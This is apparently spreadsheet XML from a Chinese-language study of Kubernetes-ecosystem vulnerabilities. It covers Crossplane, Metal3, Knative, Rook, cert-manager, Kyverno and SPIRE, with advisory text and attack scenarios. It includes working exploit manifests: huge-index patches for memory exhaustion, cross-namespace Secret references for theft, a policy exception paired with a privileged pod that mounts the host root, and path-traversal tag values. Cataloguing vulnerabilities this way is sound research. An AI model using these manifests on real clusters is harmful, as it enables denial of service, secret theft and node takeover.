    </r>
  </si>
  <si>
    <t>Affected versions
&lt;= 1.11.1, &lt;= 1.10.2, &lt;= 1.9.1</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Patched versions
1.11.2, 1.10.3, 1.9.2
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>实际的修复位置在crossplane-runtime中：</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
https://github.com/crossplane/crossplane-runtime/pull/390/commits
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>crossplane只替换了crossplane-runtime的版本</t>
    </r>
  </si>
  <si>
    <t>https://github.com/crossplane/crossplane/security/advisories/GHSA-v829-x6hh-cqfq</t>
  </si>
  <si>
    <t>reate or update Compositions can specify an arbitrarily high index in a patch's `ToFieldPath`
权限要求：
攻击者需要拥有创建或更新Compositions资源的权限
通常这是高权限操作，限于管理员或特权用户
需要compositions.apiextensions.crossplane.io资源的create和update权限
环境条件：
目标环境必须运行受影响版本的Crossplane
Crossplane控制器必须处于活动状态
目标Pod必须没有严格的内存限制（或限制足够高）
技术要求：
攻击者需要了解Crossplane的Compositions结构
需要知道如何构造带有极大索引值的补丁（patches）</t>
  </si>
  <si>
    <t>渗透初期：
攻击者获取了集群中的高权限账户（如通过凭证泄露、权限提升等）
或者合法管理员误操作/恶意操作
漏洞利用：
攻击者创建或修改Composition资源
在资源定义中包含一个具有异常大索引的补丁（patch）
提交到API服务器
攻击效果：
Crossplane控制器处理这个Composition时会尝试创建一个巨大的数组
系统内存迅速耗尽
Crossplane Pod被OOM-Killed（内存不足杀死）
导致所有依赖该控制器的操作中断
集群其他用户的服务受到影响
持续性影响：
如果该恶意Composition没有被移除，每当Crossplane控制器重启后都会再次触发漏洞
可能导致持续的服务拒绝</t>
  </si>
  <si>
    <t>Compositions
-------------
apiVersion: apiextensions.crossplane.io/v1
kind: Composition
metadata:
  name: malicious-composition
  labels:
    type: exploit
    purpose: demo
spec:
  compositeTypeRef:
    apiVersion: example.org/v1alpha1
    kind: XService
  resources:
    - name: exploitResource
      base:
        apiVersion: kubernetes.crossplane.io/v1alpha1
        kind: Object
        spec:
          forProvider:
            manifest:
              apiVersion: v1
              kind: ConfigMap
              metadata:
                name: target-config
              data:
                key1: "value1"
      patches:
        # 这是触发漏洞的关键部分 - 使用接近uint32最大值的索引
        - fromFieldPath: "spec.parameters"
          toFieldPath: "spec.forProvider.manifest.data.items[4294967290]"
          type: FromCompositeFieldPath
        # 再添加几个大索引值，加剧内存消耗
        - fromFieldPath: "spec.parameters"
          toFieldPath: "spec.forProvider.manifest.data.anotherArray[4294967000]"
          type: FromCompositeFieldPath
        - fromFieldPath: "spec.parameters"
          toFieldPath: "spec.forProvider.manifest.data.thirdArray[4200000000]"
          type: FromCompositeFieldPath</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> func (p *Paved) setValue(s Segments, value any) err
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>-&gt; 没办法确定具体的类别</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">crossplane-runtime 
</t>
  </si>
  <si>
    <t>CVE-2024-43803</t>
  </si>
  <si>
    <t xml:space="preserve">跨命名空间Secret访问/信息泄露
这个漏洞的核心是BareMetalHost CRD的设计问题：
BareMetalHost允许通过userData、metaData和networkData字段引用Kubernetes Secret
引用包含Secret的Name和Namespace字段
BMO会从任何命名空间读取指定的Secret，而不仅仅是BMH所在的命名空间
这导致一个能创建/编辑BMH的用户可以访问集群中任何命名空间的Secret
</t>
  </si>
  <si>
    <t>The Bare Metal Operator (BMO) implements a Kubernetes API for managing bare metal hosts in Metal3. The `BareMetalHost` (BMH) CRD allows the `userData`, `metaData`, and `networkData` for the provisioned host to be specified as links to Kubernetes Secrets. There are fields for both the `Name` and `Namespace` of the Secret, meaning that versions of the baremetal-operator prior to 0.8.0, 0.6.2, and 0.5.2 will read a `Secret` from any namespace. A user with access to create or edit a `BareMetalHost` can thus exfiltrate a `Secret` from another namespace by using it as e.g. the `userData` for provisioning some host (note that this need not be a real host, it could be a VM somewhere).
BMO will only read a key with the name `value` (or `userData`, `metaData`, or `networkData`), so that limits the exposure somewhat. `value` is probably a pretty common key though. Secrets used by _other_ `BareMetalHost`s in different namespaces are always vulnerable. It is probably relatively unusual for anyone other than cluster administrators to have RBAC access to create/edit a `BareMetalHost`. This vulnerability is only meaningful, if the cluster has users other than administrators and users' privileges are limited to their respective namespaces.
The patch prevents BMO from accepting links to Secrets from other namespaces as BMH input. Any BMH configuration is only read from the same namespace only. The problem is patched in BMO releases v0.7.0, v0.6.2 and v0.5.2 and users should upgrade to those versions. Prior upgrading, duplicate the BMC Secrets to the namespace where the corresponding BMH is. After upgrade, remove the old Secrets. As a workaround, an operator can configure BMO RBAC to be namespace scoped for Secrets, instead of cluster scoped, to prevent BMO from accessing Secrets from other namespaces.</t>
  </si>
  <si>
    <t>Affected versions
&lt; v0.8.0</t>
  </si>
  <si>
    <t>Patched versions
v0.8.0, v0.6.2, v0.5.2
https://github.com/metal3-io/baremetal-operator/pull/1929
https://github.com/metal3-io/baremetal-operator/commit/3af4882e9c5fadc1a7550f53daea21dccd271f74#diff-210d7f9a3163ab859302078864c7af8e554d1fa51b48f5eae5e5c06601305dcb</t>
  </si>
  <si>
    <t>https://github.com/metal3-io/baremetal-operator/security/advisories/GHSA-pqfh-xh7w-7h3p</t>
  </si>
  <si>
    <t>bare metal operator(bmo)</t>
  </si>
  <si>
    <t>攻击者需要有权限创建/编辑BareMetalHost资源
目标Secret必须有名为value、userData、metaData或networkData的键
如果BMO的RBAC已经配置为命名空间范围，则无法利用</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">crd资源的设计运行跨namespace 读取敏感密钥信息
----
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>跨命名空间数据窃取：</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
攻击者在自己有权限的命名空间中创建/编辑BMH资源
在BMH的userData中指定目标Secret的名称和其所在的命名空间
BMO读取目标Secret并将其用于主机配置（潜在地将Secret泄露）
攻击者可以从日志、错误信息或配置的主机中获取Secret内容
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>机密信息获取：</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
攻击者可以访问其他用户命名空间中的Secret
这些Secret可能包含敏感凭证、密钥或配置
--------
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>信息提取方法：</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
直接读取：如果BMO将Secret内容输出到日志
间接读取：如果Secret内容被用于配置可访问的主机
错误信息：如果处理过程中发生错误并包含Secret内容
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>多种利用变体：</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
配置中提供了利用userData的示例
同样可以利用metaData和networkData字段
甚至可以同时尝试多个字段来获取不同的Secret</t>
    </r>
  </si>
  <si>
    <t>资源引用注入或者跨域注入
----
注入的不是恶意内容而是合法的引用：
攻击者没有注入非法字符或恶意代码
而是利用了合法的配置字段(namespace)指向了不应被访问的资源
漏洞的本质是跨域引用：
攻击者注入的是跨越了信任域边界的资源引用
问题不在于字段内容的格式或类型，而在于引用的权限边界</t>
  </si>
  <si>
    <t>The `BareMetalHost` (BMH) CRD allows the `userData`, `metaData`, and `networkData` for the provisioned host to be specified as links to Kubernetes Secrets. 
---
# 这个配置演示如何利用Bare Metal Operator的跨命名空间Secret访问漏洞
# 在实际攻击中，攻击者只需创建/修改BareMetalHost资源
# 首先，我们假设在一个受限命名空间(restricted-namespace)中有一个敏感Secret
# 攻击者无法直接访问此命名空间
apiVersion: v1
kind: Secret
metadata:
  name: sensitive-credentials
  namespace: restricted-namespace
type: Opaque
data:
  # 注意：BMO只会读取名为"value"的键，这是漏洞的限制之一
  value: VGhpcyBpcyBhIHNlbnNpdGl2ZSBjcmVkZW50aWFsIHRoYXQgYXR0YWNrZXIgd2FudHMgdG8gc3RlYWw=  # "This is a sensitive credential that attacker wants to steal" in base64
---
# 攻击者在自己有权限的命名空间中创建此BareMetalHost资源
apiVersion: metal3.io/v1alpha1
kind: BareMetalHost
metadata:
  name: exploit-host
  namespace: attacker-namespace
spec:
  online: true
  bmc:
    address: ipmi://192.168.0.100
    credentialsName: bmc-credentials
  bootMACAddress: 00:11:22:33:44:55
  # 以下是漏洞利用的关键部分 - 跨命名空间引用Secret
  userData:
    # 指向其他命名空间的Secret
    name: sensitive-credentials
    namespace: restricted-namespace  # 跨命名空间引用，这是漏洞的核心
  # 可选: 尝试其他数据也可能泄露不同的Secret
  # metaData:
  #   name: another-secret
  #   namespace: restricted-namespace
  # networkData:
  #   name: network-config
  #   namespace: restricted-namespace
---
# 攻击者自己命名空间中的BMC凭证Secret
apiVersion: v1
kind: Secret
metadata:
  name: bmc-credentials
  namespace: attacker-namespace
type: Opaque
data:
  username: YWRtaW4=  # "admin" in base64
  password: cGFzc3dvcmQ=  # "password" in base64</t>
  </si>
  <si>
    <t>读资源</t>
  </si>
  <si>
    <t>跨命令空间读取资源</t>
  </si>
  <si>
    <t>Remote code execution from lack of image validation in
Knative Func</t>
  </si>
  <si>
    <t>knative 安全审计报告: ADA-KNATIVE-23-7(Knative Security Audit 2023)
Knative Func在获取镜像配置文件时存在关键缺陷：
未对获取的镜像进行有效验证
无法检测镜像是否被篡改
直接信任并使用镜像中的可选标签（Labels）信息</t>
  </si>
  <si>
    <t>静态分析</t>
  </si>
  <si>
    <t>When Knative Func pulls an image to get its config file, Knative does not validate the fetched image
and will not detect any potential tampering</t>
  </si>
  <si>
    <t>knative</t>
  </si>
  <si>
    <t xml:space="preserve">
攻击者需要：
控制镜像注册表
能够向Knative Func用户返回恶意镜像</t>
  </si>
  <si>
    <t>上传恶意镜像
攻击者可以通过以下步骤利用该漏洞：
获得对镜像注册表的控制（通过多种可能途径）：
破解镜像所属用户账号
接管注册表上被遗忘的用户
请求并获得镜像的管理员权限
直接入侵注册表
创建恶意镜像：
在镜像配置中添加io.openshift.s2i.scripts-url标签
标签值设为指向攻击者控制的恶意脚本的URL（可以是本地或远程URL）
利用S2I构建流程：
当Knative Func用户使用S2I构建器构建函数时
Knative获取包含恶意脚本URL的镜像配置
S2I构建器从攻击者控制的URL下载脚本
下载的脚本被赋予执行权限（chmod 0755）
恶意脚本在受害者的构建环境中执行</t>
  </si>
  <si>
    <t>代码执行</t>
  </si>
  <si>
    <t>image.label: io.openshift.s2i.scripts-url
在镜像配置中添加io.openshift.s2i.scripts-url标签
标签值设为指向攻击者控制的恶意脚本的URL（可以是本地或远程URL）</t>
  </si>
  <si>
    <t>Knative Func构建过程</t>
  </si>
  <si>
    <t>Lack of validation leadsto failure to deploy Ceph object( 非常典型的例子）</t>
  </si>
  <si>
    <t>安全报告审计结果
trail of bits 2019: TOB-ROOK-010</t>
  </si>
  <si>
    <t>When creating a CephObjectStore entry, there is no validation for the CRD object’s gateway
port attribute (Figure TOB-ROOK-010.1). Therefore, when one attempts to create a CRD
entry with an invalid port value (Figure TOB-ROOK-010.2), it is accepted by the CRD API
(Figure TOB-ROOK-010.3). The rook-ceph-operator subsequently attempts to create a
Kubernetes Service pointing to the un-validated gateway address, but the Service CRD
validation of the port fails and the Service is not created. Attempting to create the object
again will fail because there is already an instance of the CephObjectStore</t>
  </si>
  <si>
    <t>rook</t>
  </si>
  <si>
    <t>An attacker creates a significant number of invalid CephObjectStore CRD entries, resulting
in the rook-ceph-operator generating a large amount of errors until the entries are
removed
1. 前提条件
对Kubernetes集群具有创建CRD资源的权限
目标集群使用Rook Ceph运算符
集群配置允许创建CephObjectStore资源
2. 攻击者所需权限
Kubernetes集群的最低权限：
创建CRD资源
访问特定命名空间（如rook-ceph）
具备 create 和 get 权限</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>审计报告中有详细的利用poc:
======</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
场景1：资源消耗型攻击
apiVersion: ceph.rook.io/v1
kind: CephObjectStore
metadata:
  name: malicious-store-{1..100}  # 批量创建大量无效对象
  namespace: rook-ceph
spec:
  metadataPool:
    replicated:
      size: 1
  dataPool:
    replicated:
      size: 1
  gateway:
    type: s3
    port: 999999999  # 无效端口
    securePort: 123456789  # 同样无效
    instances: 1
场景2：日志轰炸
重复创建无效CephObjectStore
触发大量错误日志
可能导致日志系统资源消耗
场景3：拒绝服务
持续创建无效对象
阻塞正常的CephObjectStore创建流程
消耗操作员处理能力</t>
    </r>
  </si>
  <si>
    <t>CephObjectStore
可触发漏洞的资源配置
1. 端口范围攻击
yamlCopy# 超出有效端口范围
port: 0  # 低于1
port: 65536  # 高于65535
port: -1  # 负数端口
2. 随机端口注入
yamlCopy# 随机大数值
port: 123456789
port: 2147483647  # 整型最大值
3. 特殊值攻击
yamlCopy# 特殊数值
port: null
port: ""  # 空字符串
port: NaN  # 非数值</t>
  </si>
  <si>
    <t>最终的端口验证发生在Kubernetes Service创建阶段</t>
  </si>
  <si>
    <t>Potential slowdown / DoS when parsing specially crafted PEM inputs</t>
  </si>
  <si>
    <t>github security 中的issue，没有明确的cve 编号
这个漏洞利用了Golang标准库中pem.Decode()函数在处理特定构造的无效PEM数据时的性能问题：
PEM(Privacy Enhanced Mail)格式是存储和传输密码学密钥、证书等的标准格式
cert-manager作为Kubernetes中的证书管理工具，大量使用pem.Decode()解析PEM数据
特制的无效PEM数据可导致解析函数执行时间剧增
攻击者可以修改cert-manager读取的PEM数据（如Secret资源中）
这会导致cert-manager控制器消耗大量CPU资源
最终可能影响cert-manager在集群中的功能，形成拒绝服务攻击</t>
  </si>
  <si>
    <t>动态测试-&gt;能是通过模糊测试(Fuzzing)发现的特殊模式，如漏洞描述中提到的，这种模式会导致解析时间从微秒级增加到毫秒级（增加约10,000倍）。</t>
  </si>
  <si>
    <t>cert-manager packages which call the standard library pem.Decode() function can take a long time to process specially crafted invalid PEM data.
If an attacker is able to modify PEM data which cert-manager reads (e.g. in a Secret resource), they may be able to use large amounts of CPU in the cert-manager controller pod to effectively create a denial-of-service (DoS) vector for cert-manager in the cluster.
Secrets are limited in size to 1MiB, which reduces the impact of this issue; it was discovered through an ~856kB fuzz test input which causes pem.Decode to take roughly 750ms to reject the input on an M2 Max Macbook Pro. By way of comparison, a valid PEM-encoded 4096-bit RSA key takes roughly 70µs to parse on the same machine.
Given the required size of PEM data needed to present a realistic DoS vector, an attacker would need to create or insert many different large sized resources in the cluster, and so the best secondary defense is to ensure that sensible limits are placed via RBAC.
This issue affects all versions of cert-manager to have been released since at least v0.1.0 (since pem.Decode is core functionality for cert-manager). All supported releases are patched.</t>
  </si>
  <si>
    <t>Affected versions
&lt;v1.12.14,&lt;v1.15.4,&lt;v1.16.2</t>
  </si>
  <si>
    <t>Patched versions
v1.16.2,v1.15.4,v1.12.14
https://github.com/cert-manager/cert-manager/pull/7400
https://github.com/cert-manager/cert-manager/pull/7400/commits</t>
  </si>
  <si>
    <t>https://github.com/cert-manager/cert-manager/security/advisories/GHSA-r4pg-vg54-wxx4</t>
  </si>
  <si>
    <t>cert-manager</t>
  </si>
  <si>
    <t>攻击者需要有权限创建或修改Secret资源
这些Secret需要位于cert-manager监视的命名空间中
或者是cert-manager配置为使用的特定Secret</t>
  </si>
  <si>
    <t>1. 带有pem data的resource
2. 注入恶意payload
----
如果攻击者能够在集群中创建多个这样的Secret：
cert-manager会尝试处理这些Secret中的PEM数据
每个Secret的处理会消耗大量CPU时间
cert-manager控制器可能会变得无响应
集群中依赖cert-manager的证书管理功能可能会受到影响</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">secret.pem
：攻击者可以通过创建或修改包含特制PEM数据的Secret资源来触发这个漏洞
漏洞触发要素
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>1.Secret资源：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
创建一个类型为kubernetes.io/tls的Secret
添加标签cert-manager.io/certificate-name让cert-manager识别该Secret
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>2.恶意PEM数据：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
在tls.crt和tls.key字段中包含特制的PEM数据
示例中的PEM数据只是简单的Base64编码示意
实际攻击中，需要特殊构造的数据来触发pem.Decode()的性能问题
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>3.关联Certificate资源：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
创建一个Certificate资源指向该Secret
这会让cert-manager尝试管理和处理这个Secret
-----
apiVersion: v1
kind: Secret
metadata:
  name: malicious-tls-cert
  namespace: default
  # 添加标签使cert-manager识别并处理此Secret
  labels:
    cert-manager.io/certificate-name: malicious-cert
type: kubernetes.io/tls
data:
  # 以下是概念性的恶意PEM数据结构
  # 实际攻击中，这里应该是经过特殊构造的无效PEM数据
  # 它会导致pem.Decode()函数耗费大量CPU时间
  tls.crt: |
    LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCi0tLS0tQkVHSU4gQ0VSVElGSUNBVEUtLS0tLQotLS0tLUJFR0lOIENFUlRJRklDQVRFLS0tLS0KLS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCi0tLS0tQkVHSU4gQ0VSVElGSUNBVEUtLS0tLQo=
  # 在实际攻击中，这个值会包含近1MB的特制数据，这里只是示例
  tls.key: |
    LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCi0tLS0tQkVHSU4gUFJJVkFURSBLRVktLS0tLQotLS0tLUJFR0lOIFBSSVZBVEUgS0VZLS0tLS0KLS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCi0tLS0tQkVHSU4gUFJJVkFURSBLRVktLS0tLQo=
---
# 关联的Certificate资源，让cert-manager处理上面的Secret
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
  name: malicious-cert
  namespace: default
spec:
  secretName: malicious-tls-cert
  duration: 2160h # 90d
  renewBefore: 360h # 15d
  privateKey:
    algorithm: RSA
    size: 2048
  dnsNames:
    - example.com
  issuerRef:
    name: some-issuer
    kind: ClusterIssuer</t>
    </r>
  </si>
  <si>
    <t>利用pem.Decode()函数处理特制PEM数据时的性能问题Golang标准库中pem.Decode()函数在处理特定构造的无效PEM数据时的性能问题：</t>
  </si>
  <si>
    <t xml:space="preserve">controller
 </t>
  </si>
  <si>
    <t>CVE-2024-48921</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">这个漏洞的核心问题是 Kyverno 设计中的一个缺陷：
Kyverno 允许通过创建 PolicyException 资源来为特定工作负载提供策略豁免
设计上，PolicyException 可以从任何命名空间被消费，而不仅限于发起请求的命名空间
管理员可能没有意识到这一点，误以为只有拥有特定命名空间权限的用户才能创建对应的例外
实际上，拥有任何命名空间权限的用户都可以创建能绕过集群安全策略的例外
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
漏洞的关键在于</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>：Kyverno设计上允许任何命名空间的PolicyException影响集群级别的策略决策。这打破了命名空间隔离的安全边界。</t>
    </r>
  </si>
  <si>
    <t>A kyverno ClusterPolicy, ie. "disallow-privileged-containers," can be overridden by the creation of a PolicyException in a random namespace.</t>
  </si>
  <si>
    <t xml:space="preserve">Affected versions
&lt;1.13.0
</t>
  </si>
  <si>
    <t>Patched versions
1.13.0</t>
  </si>
  <si>
    <t>https://github.com/kyverno/kyverno/security/advisories/GHSA-qjvc-p88j-j9rm</t>
  </si>
  <si>
    <t>kyverno</t>
  </si>
  <si>
    <t>利用前提
这个影响Kyverno的跨命名空间策略绕过漏洞(CVE-2024-48921)需要满足以下前提条件才能被利用：
Kyverno部署：
目标集群必须安装了存在漏洞的Kyverno版本
Kyverno必须被配置为强制执行集群安全策略
权限要求：
攻击者需要在任何命名空间拥有创建PolicyException资源的权限
通常需要具有命名空间级别的create权限，针对policyexceptions.kyverno.io资源
策略配置：
集群中必须存在管理员创建的ClusterPolicy（如限制特权容器的策略）
这些策略必须应用于攻击者想要突破限制的命名空间
目标访问：
攻击者需要能够在目标命名空间中创建工作负载（如Pod）
这要求攻击者有权限在目标命名空间创建资源
管理员配置假设：
管理员没有显式限制PolicyException的创建权限
管理员错误地假设命名空间隔离会限制PolicyException的作用范围</t>
  </si>
  <si>
    <t>1.Administrator creates "disallow-privileged-containers" ClusterPolicy that applies to resources in the namespace "ubuntu-restricted"
2.Cluster user creates a PolicyException object for "disallow-privileged-containers" in namespace "ubuntu-restricted"
3.Cluster user creates a pod with a privileged container in "ubuntu-restricted"
4.Cluster user escalates to root on the node from the privileged container
安全策略资源对象会被其他的资源对象覆盖
管理员创建名为 "disallow-privileged-containers" 的 ClusterPolicy，应用于 "ubuntu-restricted" 命名空间
集群用户在 "ubuntu-restricted" 命名空间中创建针对 "disallow-privileged-containers" 的 PolicyException
集群用户在 "ubuntu-restricted" 命名空间中创建带有特权容器的 Pod
集群用户通过特权容器提升权限，获取节点的 root 权限</t>
  </si>
  <si>
    <t xml:space="preserve">ClusterPolicy
PolicyExceptions 
----
# 1. 管理员创建的集群策略 - 这是已经存在的策略，由管理员配置
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: disallow-privileged-containers
spec:
  validationFailureAction: Enforce
  background: true
  rules:
    - name: privileged-containers
      match:
        any:
        - resources:
            kinds:
              - Pod
            namespaces:
              - ubuntu-restricted  # 限制在此命名空间中不能使用特权容器
      validate:
        message: "Privileged containers are not allowed."
        pattern:
          spec:
            containers:
              - name: "*"
                securityContext:
                  privileged: false  # 禁止特权容器
---
# 2. 攻击者创建策略例外 - 这是漏洞利用的关键部分
apiVersion: kyverno.io/v2beta1
kind: PolicyException
metadata:
  name: privileged-exception
  namespace: ubuntu-restricted  # 在目标命名空间创建例外
spec:
  exceptions:
  - policyName: disallow-privileged-containers  # 指定要绕过的策略
    ruleNames: 
    - privileged-containers  # 绕过特定规则
  match:
    any:
    - resources:
        kinds:
          - Pod
        names:
          - privileged-exploit-pod*  # 为特定pod提供例外
        namespaces:
          - ubuntu-restricted
---
# 3. 攻击者部署特权容器 - 在策略应该阻止的地方部署特权容器
apiVersion: v1
kind: Pod
metadata:
  name: privileged-exploit-pod
  namespace: ubuntu-restricted
  labels:
    app: exploit
spec:
  containers:
  - name: privilege-escalation
    image: ubuntu:20.04
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true  # 这本应被策略阻止，但由于例外而被允许
    volumeMounts:
    - mountPath: /host
      name: host-root
  volumes:
  - name: host-root
    hostPath:
      path: /  # 挂载主机根目录
      type: Directory
</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>CVE-2021-27099</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>说明类似的检测方法可扩展到其他的云平台配置上）</t>
    </r>
  </si>
  <si>
    <t>漏洞机制
这个漏洞的核心是SPIRE在使用代理ID模板（agent ID templating）时存在的路径规范化问题：
aws_iid节点认证器在处理通过代理ID模板功能提供的路径时，没有正确规范化路径
如果攻击者能够在认证前控制EC2标签的值，并且认证器配置了将标签值作为路径最后一个元素的代理ID模板
攻击者可以注入特殊构造的路径值（如包含".."的路径）
导致可以在同一信任域内获取任意SPIFFE ID</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>In SPIRE before versions 0.8.5, 0.9.4, 0.10.2, 0.11.3 and 0.12.1, the "aws_iid" Node Attestor improperly normalizes the path provided through the agent ID templating feature, which may allow the issuance of an arbitrary SPIFFE ID within the same trust domain,</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> if the attacker controls the value of an EC2 tag prior to attestation, and the attestor is configured for agent ID templating where the tag value is the last element in the path. </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>This issue has been fixed in SPIRE versions 0.11.3 and 0.12.1</t>
    </r>
  </si>
  <si>
    <t>Affected versions
&lt;0.8.4, &lt;0.9.4, &lt;0.10.2, &lt;0.11.3, &lt;0.12.1</t>
  </si>
  <si>
    <t>Patched versions
0.11.3, 0.12.1
https://github.com/spiffe/spire/commit/a1762b93059a7408f85cf3c1d5a23bee45fd0d4f</t>
  </si>
  <si>
    <t>https://github.com/spiffe/spire/security/advisories/GHSA-q7gm-mjrg-44h9</t>
  </si>
  <si>
    <t>spire</t>
  </si>
  <si>
    <t>EC2标签控制能力：
攻击者必须能够控制EC2实例的标签值
这通常需要拥有AWS账户中的ec2:CreateTags权限
攻击必须发生在SPIRE节点认证之前（实例启动时或早期阶段）
SPIRE配置状态：
目标环境必须使用易受攻击的SPIRE版本（低于0.8.5、0.9.4、0.10.2、0.11.3或0.12.1）
必须配置使用aws_iid节点认证器
认证器必须配置agent_path_template，并在模板中使用EC2标签作为路径的最后元素</t>
  </si>
  <si>
    <t xml:space="preserve">
实际攻击场景
场景1：内部威胁
攻击者角色：拥有AWS资源创建权限但缺乏更高权限的DevOps工程师
攻击流程：
攻击者观察到组织使用SPIRE来管理服务身份，并且使用EC2标签来分配SPIFFE ID
攻击者创建新的EC2实例，设置标签role="../../../admin/database"
当EC2实例启动并进行SPIRE节点认证时，获得高权限身份
利用这个伪造的身份，攻击者能够访问受保护的数据库服务
影响：权限提升、数据访问控制绕过
场景2：云基础设施供应链攻击
攻击者角色：拥有自动化部署平台访问权限的攻击者
攻击流程：
攻击者发现组织使用自动化工具（如Terraform）部署EC2实例
攻击者修改部署模板或配置，将恶意标签添加到新创建的实例中
当实例部署并注册到SPIRE时，获得伪造的更高权限身份
所有使用这些模板部署的新实例都会获得过高权限
影响：大规模权限边界突破、持久性后门
场景3：跨租户攻击
攻击者角色：共享AWS账户中的其他团队成员
攻击流程：
在共享AWS账户中，攻击者注意到其他团队使用SPIRE管理身份
攻击者将自己的EC2实例标签设置为包含路径遍历的值
实例获得属于其他团队的SPIFFE ID
攻击者可以访问只允许其他团队访问的服务和数据
影响：隔离突破、跨团队数据泄露</t>
  </si>
